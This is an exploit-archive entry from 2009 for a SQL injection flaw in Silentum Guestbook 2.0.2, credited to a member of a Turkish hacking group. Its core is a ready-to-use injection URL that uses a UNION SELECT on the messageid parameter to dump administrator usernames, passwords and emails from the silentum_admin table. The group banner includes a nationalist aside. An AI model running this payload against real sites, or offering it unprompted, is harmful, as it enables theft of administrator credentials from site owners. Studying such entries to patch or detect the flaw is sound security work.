Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln

2009-07-20T00:00:00
ID 1337DAY-ID-5517
Type zdt
Reporter Bgh7
Modified 2009-07-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln
====================================================================


##Silentum Guestbook v2.0.2 (silentum_guestbook.php) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri Group / Ihlilal Hatti
##
##Bug: Sql Injection
##
##Indir/Download: http://hypersilence.net/silentum_guestbook.php
##
##Biz ki neler gorduk, biz ki neler cektik... 2-3 Cekik gozluden mi korkacag?z ?
##Cin somurecek bir rezerv daha buldugunu san?yor, yaz?k...
#######################################################################
#######################################################################
Sql: silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/**
#######################################################################
#######################################################################



#  0day.today [2018-01-09]  #